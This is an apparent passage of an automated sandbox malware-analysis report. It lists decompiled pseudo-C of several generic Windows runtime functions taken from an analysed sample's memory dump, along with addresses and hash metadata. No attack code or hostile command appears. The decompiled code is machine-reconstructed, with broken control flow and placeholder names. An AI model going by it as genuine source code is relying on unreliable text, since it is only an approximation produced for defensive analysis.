						_t38 =  *0x18a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L017D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M017EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                    0x017ee730
                                                    0x017ee736
                                                    0x017ee738
                                                    0x017ee73d
                                                    0x017ee73e
                                                    0x017ee740
                                                    0x017ee749
                                                    0x017ee765
                                                    0x017ee76a
                                                    0x017ee76b
                                                    0x017ee76c
                                                    0x017ee76d
                                                    0x017ee76e
                                                    0x017ee76f
                                                    0x017ee775
                                                    0x017ee777
                                                    0x017ee77e
                                                    0x0182b675
                                                    0x017ee784
                                                    0x017ee784
                                                    0x017ee789
                                                    0x017ee7a8
                                                    0x017ee7ac
                                                    0x017ee807
                                                    0x017ee7ae
                                                    0x017ee7ae
                                                    0x017ee7b1
                                                    0x017ee7b4
                                                    0x017ee7b9
                                                    0x017ee7c0
                                                    0x017ee7c4
                                                    0x017ee7ca
                                                    0x017ee7cc
                                                    0x00000000
                                                    0x017ee7d3
                                                    0x017ee7d6
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7ff
                                                    0x017ee802
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7f9
                                                    0x017ee7fc
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7f3
                                                    0x017ee7f6
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7ed
                                                    0x017ee7f0
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7e7
                                                    0x017ee7ea
                                                    0x00000000
                                                    0x00000000
                                                    0x0182b685
                                                    0x0182b688
                                                    0x00000000
                                                    0x00000000
                                                    0x0182b682
                                                    0x00000000
                                                    0x00000000
                                                    0x017ee7cc
                                                    0x017ee7d9
                                                    0x017ee7dc
                                                    0x017ee7de
                                                    0x017ee7de
                                                    0x017ee7ac
                                                    0x017ee7e4
                                                    0x017ee74b
                                                    0x017ee751
                                                    0x017ee759
                                                    0x017ee761
                                                    0x017ee761

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b77b96be02998a52cde6d083bbbe81d75c07f084a491ad00207a5679ff9aabb3
                                                    • Instruction ID: 2cf91c34721da7b74e402e68873b73ee3a72cb660232d52414518be92d881ed5
                                                    • Opcode Fuzzy Hash: b77b96be02998a52cde6d083bbbe81d75c07f084a491ad00207a5679ff9aabb3
                                                    • Instruction Fuzzy Hash: 87316D75A54249EFD744CF58D845B9AFBE4FB09314F14869AFA04CB341DA31ED80CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EBC2C Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E017EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x18a6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E017D2280(0xd, 0x7b3f1a0);
				_t41 =  *0x18a60f8; // 0x0
				if(_t41 != 0) {
					 *0x18a60f8 =  *_t41;
					 *0x18a60fc =  *0x18a60fc + 0xffff;
				}
				E017CFFB0(_t41, 0x800, 0x7b3f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x18a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L017D4620(0x18a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x18a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                    0x017ebc36
                                                    0x017ebc42
                                                    0x017ebc45
                                                    0x017ebc4a
                                                    0x017ebd35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017ebc50
                                                    0x017ebc50
                                                    0x017ebc58
                                                    0x017ebc5a
                                                    0x017ebc60
                                                    0x00000000
                                                    0x00000000
                                                    0x0182a4f2
                                                    0x0182a4f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0182a4fc
                                                    0x017ebc79
                                                    0x017ebc7e
                                                    0x017ebc86
                                                    0x017ebd16
                                                    0x017ebd20
                                                    0x017ebd20
                                                    0x017ebc8d
                                                    0x017ebc94
                                                    0x017ebcbd
                                                    0x017ebcca
                                                    0x017ebccb
                                                    0x017ebccc
                                                    0x017ebccd
                                                    0x017ebcce
                                                    0x017ebcd4
                                                    0x017ebcea
                                                    0x017ebcee
                                                    0x017ebcf2
                                                    0x017ebd00
                                                    0x017ebd04
                                                    0x00000000
                                                    0x017ebc96
                                                    0x017ebcab
                                                    0x017ebcaf
                                                    0x017ebd2c
                                                    0x017ebd2c
                                                    0x017ebd09
                                                    0x00000000
                                                    0x017ebd09
                                                    0x017ebcb1
                                                    0x017ebcb5
                                                    0x017ebcbb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017ebcbb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09fabe8b7d5fcc309c0eb1f45d3fc32368dda5a773aea3f0dcfabd3929a44107
                                                    • Instruction ID: 2a78fcb1052e7eba414da1acaa6cf973677534c98b559e01e94ea8ea14a9a082
                                                    • Opcode Fuzzy Hash: 09fabe8b7d5fcc309c0eb1f45d3fc32368dda5a773aea3f0dcfabd3929a44107
                                                    • Instruction Fuzzy Hash: E631F2326006169BDB12DF58D4C47A6BBF4FF18310F590079ED55EB20AEB75DA898BC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B9100 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E017B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x188f6e8);
				E0180D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E018888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0180D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18a86c0; // 0x12807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E017D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E018888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E017FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x18ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18a84c0;
										if(_t69 >=  *0x18a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01889063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E017B922A(_t82);
							_t53 = E017D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01888B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18a86c0; // 0x12807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18a86bc;
										_t72 = 0x18a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E017B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18a86c4;
									_t72 = 0x18a86c0;
									L18:
									E017E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                    0x017b9100
                                                    0x017b9100
                                                    0x017b9100
                                                    0x017b9100
                                                    0x017b9102
                                                    0x017b9107
                                                    0x017b910c
                                                    0x017b9110
                                                    0x017b9115
                                                    0x017b9136
                                                    0x017b9143
                                                    0x018137e4
                                                    0x018137e4
                                                    0x017b9149
                                                    0x017b914e
                                                    0x017b914e
                                                    0x017b9117
                                                    0x017b911d
                                                    0x00000000
                                                    0x00000000
                                                    0x017b911f
                                                    0x017b9125
                                                    0x00000000
                                                    0x017b9151
                                                    0x017b9158
                                                    0x017b915d
                                                    0x017b9161
                                                    0x017b9168
                                                    0x01813715
                                                    0x00000000
                                                    0x017b916e
                                                    0x017b916e
                                                    0x017b9175
                                                    0x017b9177
                                                    0x017b917e
                                                    0x017b917f
                                                    0x017b9182
                                                    0x017b9182
                                                    0x017b9187
                                                    0x017b9187
                                                    0x017b918a
                                                    0x017b918d
                                                    0x017b918f
                                                    0x017b9192
                                                    0x017b9195
                                                    0x017b9198
                                                    0x017b9198
                                                    0x017b9198
                                                    0x017b919a
                                                    0x00000000
                                                    0x00000000
                                                    0x0181371f
                                                    0x01813721
                                                    0x01813727
                                                    0x0181372f
                                                    0x01813733
                                                    0x01813735
                                                    0x01813738
                                                    0x0181373b
                                                    0x0181373d
                                                    0x01813740
                                                    0x00000000
                                                    0x00000000
                                                    0x01813746
                                                    0x01813749
                                                    0x00000000
                                                    0x00000000
                                                    0x0181374f
                                                    0x01813751
                                                    0x00000000
                                                    0x00000000
                                                    0x01813757
                                                    0x01813759
                                                    0x0181375c
                                                    0x0181375c
                                                    0x0181375e
                                                    0x0181375e
                                                    0x01813761
                                                    0x01813764
                                                    0x00000000
                                                    0x00000000
                                                    0x01813766
                                                    0x01813768
                                                    0x018137a3
                                                    0x018137a3
                                                    0x018137a5
                                                    0x018137a7
                                                    0x018137ad
                                                    0x018137b0
                                                    0x018137b2
                                                    0x018137bc
                                                    0x018137c2
                                                    0x018137c2
                                                    0x018137b2
                                                    0x017b9187
                                                    0x017b9187
                                                    0x017b918a
                                                    0x017b918d
                                                    0x017b918f
                                                    0x017b9192
                                                    0x017b9195
                                                    0x00000000
                                                    0x017b9195
                                                    0x00000000
                                                    0x017b9187
                                                    0x0181376a
                                                    0x0181376a
                                                    0x0181376c
                                                    0x0181376c
                                                    0x0181376f
                                                    0x01813775
                                                    0x00000000
                                                    0x00000000
                                                    0x01813777
                                                    0x01813779
                                                    0x00000000
                                                    0x00000000
                                                    0x01813782
                                                    0x01813787
                                                    0x01813789
                                                    0x01813790
                                                    0x01813790
                                                    0x0181378b
                                                    0x0181378b
                                                    0x0181378b
                                                    0x01813792
                                                    0x01813795
                                                    0x01813795
                                                    0x01813798
                                                    0x01813798
                                                    0x0181379b
                                                    0x0181379b
                                                    0x017b91a3
                                                    0x017b91a9
                                                    0x017b91b0
                                                    0x017b91b4
                                                    0x017b91b4
                                                    0x017b91bb
                                                    0x017b91c0
                                                    0x017b91c5
                                                    0x017b91c7
                                                    0x018137da
                                                    0x017b91cd
                                                    0x017b91cd
                                                    0x017b91cd
                                                    0x017b91d2
                                                    0x017b91d5
                                                    0x017b9239
                                                    0x017b9239
                                                    0x017b91d7
                                                    0x017b91db
                                                    0x017b91e1
                                                    0x017b91e7
                                                    0x017b91fd
                                                    0x017b9203
                                                    0x017b921e
                                                    0x017b9223
                                                    0x00000000
                                                    0x017b9223
                                                    0x017b9205
                                                    0x017b9208
                                                    0x017b920c
                                                    0x017b9214
                                                    0x017b9214
                                                    0x017b91e9
                                                    0x017b91e9
                                                    0x017b91ee
                                                    0x017b91f3
                                                    0x017b91f3
                                                    0x017b91f3
                                                    0x017b91e7
                                                    0x00000000
                                                    0x017b91db
                                                    0x017b9187
                                                    0x017b9168

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d75875114bdf02346b582ed8a50f9492d0c3c43da76ff641aa656f0d4ef7ddf1
                                                    • Instruction ID: 2e2db8348aeefa2d3a448c0d9aa8a4089b56caa23ff5687794a8665da7f8e0d3
                                                    • Opcode Fuzzy Hash: d75875114bdf02346b582ed8a50f9492d0c3c43da76ff641aa656f0d4ef7ddf1
                                                    • Instruction Fuzzy Hash: 5F3181B5A05249DFEB26DB6CC4C87ECFBB1BB49318F588159C724A7251C334AA80DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E1DB5 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E017E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E017DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L017D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E017DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                    0x017e1dc2
                                                    0x017e1dc5
                                                    0x017e1dc7
                                                    0x017e1dcc
                                                    0x017e1dce
                                                    0x017e1dd6
                                                    0x017e1ddf
                                                    0x017e1de0
                                                    0x017e1de1
                                                    0x017e1de5
                                                    0x017e1de8
                                                    0x017e1def
                                                    0x017e1df0
                                                    0x017e1df6
                                                    0x017e1df7
                                                    0x017e1dfe
                                                    0x017e1e1a
                                                    0x00000000
                                                    0x00000000
                                                    0x017e1e0b
                                                    0x017e1e12
                                                    0x017e1e12
                                                    0x017e1e00
                                                    0x017e1e00
                                                    0x017e1e05
                                                    0x017e1e1e
                                                    0x017e1e23
                                                    0x0182570f
                                                    0x01825713
                                                    0x00000000
                                                    0x00000000
                                                    0x01825719
                                                    0x01825719
                                                    0x017e1e2c
                                                    0x017e1e2d
                                                    0x017e1e2e
                                                    0x017e1e2f
                                                    0x017e1e31
                                                    0x017e1e32
                                                    0x017e1e35
                                                    0x017e1e3d
                                                    0x01825723
                                                    0x0182573d
                                                    0x0182573d
                                                    0x00000000
                                                    0x01825723
                                                    0x017e1e49
                                                    0x017e1e4e
                                                    0x017e1e4e
                                                    0x017e1e09
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: 74e85a1f359db7c7d077b8f19ed9915c36e2b42bf32e5c8e2081ccbb1736ae14
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: 1B21BC72600119EFD721CF99CC89EAAFBF9EF89645F514095FA02A7250D230AE01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D0050 Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E017D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x18ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E017E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E017FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01888A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E017E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x18ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                    0x017d0055
                                                    0x017d005d
                                                    0x017d0062
                                                    0x017d006c
                                                    0x017d006f
                                                    0x017d0074
                                                    0x017d007a
                                                    0x017d007a
                                                    0x017d0080
                                                    0x017d0080
                                                    0x017d0087
                                                    0x017d008d
                                                    0x017d008f
                                                    0x017d0093
                                                    0x017d0095
                                                    0x017d009b
                                                    0x017d00f8
                                                    0x017d00fb
                                                    0x017d00fc
                                                    0x017d00ff
                                                    0x017d0108
                                                    0x017d0108
                                                    0x017d00a2
                                                    0x017d00a6
                                                    0x017d00b3
                                                    0x017d00bc
                                                    0x017d00c5
                                                    0x017d00ca
                                                    0x0181c01e
                                                    0x00000000
                                                    0x00000000
                                                    0x0181c02d
                                                    0x017d00d5
                                                    0x017d00d9
                                                    0x0181c03d
                                                    0x0181c046
                                                    0x0181c046
                                                    0x017d00df
                                                    0x017d00e2
                                                    0x017d00ea
                                                    0x017d00ef
                                                    0x017d00f2
                                                    0x017d00f6
                                                    0x017d0111
                                                    0x017d0117
                                                    0x017d0117
                                                    0x00000000
                                                    0x017d00f6
                                                    0x017d00d0
                                                    0x017d00d0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08316b04cd629897459713957c23e13ba77bb8912f96a50ad4989e981a8e1fda
                                                    • Instruction ID: ba04b13e0fe2a7aec83a91ffac21c7ec2909451acf8de8ad5d07c3e950270674
                                                    • Opcode Fuzzy Hash: 08316b04cd629897459713957c23e13ba77bb8912f96a50ad4989e981a8e1fda
                                                    • Instruction Fuzzy Hash: EF318C32241B08DFD722CB28C844B9AF7F5FF89714F18856DE59687A90EB75A901CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01836C0A Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E01836C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E017D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x18a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L017D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E017FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E017D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E017F9AE0();
						_t23 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                    0x01836c0a
                                                    0x01836c0f
                                                    0x01836c10
                                                    0x01836c13
                                                    0x01836c15
                                                    0x01836c19
                                                    0x01836c1c
                                                    0x01836c21
                                                    0x01836c28
                                                    0x01836c3a
                                                    0x01836c2a
                                                    0x01836c33
                                                    0x01836c33
                                                    0x01836c3f
                                                    0x01836c48
                                                    0x01836c4d
                                                    0x01836c60
                                                    0x01836c65
                                                    0x01836c69
                                                    0x01836c73
                                                    0x01836c79
                                                    0x01836c7f
                                                    0x01836c86
                                                    0x01836c90
                                                    0x01836c94
                                                    0x01836ca6
                                                    0x01836cb2
                                                    0x01836cbd
                                                    0x01836cbd
                                                    0x01836cc3
                                                    0x01836cc7
                                                    0x01836ccb
                                                    0x01836cd0
                                                    0x01836cd1
                                                    0x01836ce2
                                                    0x01836ce2
                                                    0x01836c69
                                                    0x01836ced

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
